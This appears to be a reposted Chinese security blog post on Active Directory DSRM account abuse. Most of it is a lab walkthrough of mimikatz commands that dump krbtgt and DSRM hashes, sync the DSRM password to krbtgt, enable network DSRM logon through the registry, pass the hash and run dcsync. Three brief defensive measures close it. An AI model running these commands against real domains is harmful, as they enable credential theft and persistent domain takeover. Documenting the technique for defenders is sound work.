域控制器DSRM账户安全防护

  • A+
所属分类:安全文章


一、DSRM简介 

  1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。通过在DC上运行ntdsutil 工具可以修改DSRM密码。

  

      2.修改DSRM密码的方法

  在域控制器上打开命令行环境,输入“ntdsutil”,常用命令如下:

  set dsrm password :设置dsrm密码  reset password on server null :在当前域控制器上恢复dsrm密码  q :退出

域控制器DSRM账户安全防护

   

   如果域控制器版本是windows2008(已安装KB961320)及以上,可以将DSRM密码同步为已存在的域用户密码。

ntdsutil # 打开命令行set dsrm passwordsync from Domain Account domainusername # 使dsrm的密码和指定域用户的密码同步。q:退出


二、.实验操作

(1)使用mimikatz查看krbtgt的NTLM Hash

     在域控制器中打开mimikatz,看到krbtgt的NTLM Hash为

:ffc79c6f14bb2c39e6ceab183cefc9c5

privilege::debuglsadump::lsa /patch /name:krbtgt或者mimikatz privilege::debug "lsadump::lsa /patch /name:krbtgt" > krbtgt.txt

域控制器DSRM账户安全防护


(2)使用mimikatz读取SAM文件中本地管理员(DSRM)的NTLM Hash

在域控制器中打开mimikatz,获得DSRM账号的NTLM Hash为:

579da618cfbfa85247acf1f800a280a4

privilege::debugtoken::elevatelsadump::sam

域控制器DSRM账户安全防护

 

(3)将DSRM账号和krbtgt 的NTLM Hash同步

ntdsutilset dsrm passwordsync from Domain Account krbtgt

域控制器DSRM账户安全防护

 

(4)查看dsrm的NTLM Hash是否同步成功

通过mimikatz,得到dsrm账号的NTLM Hash为:

ffc79c6f14bb2c39e6ceab183cefc9c5

mimikatz privilege::debug token::elevate lsadump::sam

域控制器DSRM账户安全防护

 

(5)修改dsrm的登录方式

在注册表中新建HKLM:SystemCurrentControlSetControlLsaDsrmAdminLogonBehavior项。

  DSRM的三种登录方式:

  0:默认值,只有当域控制器重启并进入DSRM模式时,才可以使用DSRM管理员账号。

  1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控制器。

  2:在任何情况下,都可以使用DSRM管理员账号登录域控制器。

  在windows server 2000以后版本的操作系统中,对DSRM使用控制台登录域控制器进行了限制.

   如果要使用DSRM账号通过网络登录域控制器,需要将该值设置为2,可用powershell进行更改。

New-ItemProperty "HKLM:SYSTEMCurrentControlSetControlLsa" -name "DsrmAdminLogonBehavior" -value 2 -PropertyType DWORD

域控制器DSRM账户安全防护

查看注册表,发现已经DsrmAdminLogonBehavior键值已设置为2.

域控制器DSRM账户安全防护

 

(6)使用DSRM账号通过网络远程登录域控制器

使用mimikatz进行哈希传递,在域成员机器的管理员模式下打开mimikatz,输入如下命令:

privilege::debugsekurlsa::pth /domain:DC /user:administrator /ntlm:ffc79c6f14bb2c39e6ceab183cefc9c5

域控制器DSRM账户安全防护

 

(7)还用mimikatz的dcsync 功能远程转储krbtgt的NTLM Hash

在哈希传递完成后,会弹出一个命令行窗口,在该命令行窗口中打开mimikatz。输入如下命令:

mimikatz "lsadump::dcsync /domain:payload.com /dc:win-dc /user:krbtgt"

  需要注意路径:新开的窗口在system32下,需要切换到mimikatz所在目录操作。

域控制器DSRM账户安全防护

域控制器DSRM账户安全防护

 

三、DSRM更改的防御措施

  1.定期检查注册表中用于控制DSRM登录方式的键值HKLMSystemCurrentControlSetControlLsaDsrmAdminLogonBehavior,确认该键值为1,或者删除该键值。

  2.定期修改域中所有域控制器的DSRM账号。

  3.经常检查ID为4794的日志,尝试设置活动目录服务还原模式的管理员密码会被记录在4794日志中。



原文地址:https://www.cnblogs.com/micr067/p/12330661.html

如果觉得文章对你有帮助,请支持下点击右下角“在看”

域控制器DSRM账户安全防护


本文始发于微信公众号(LemonSec):域控制器DSRM账户安全防护

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: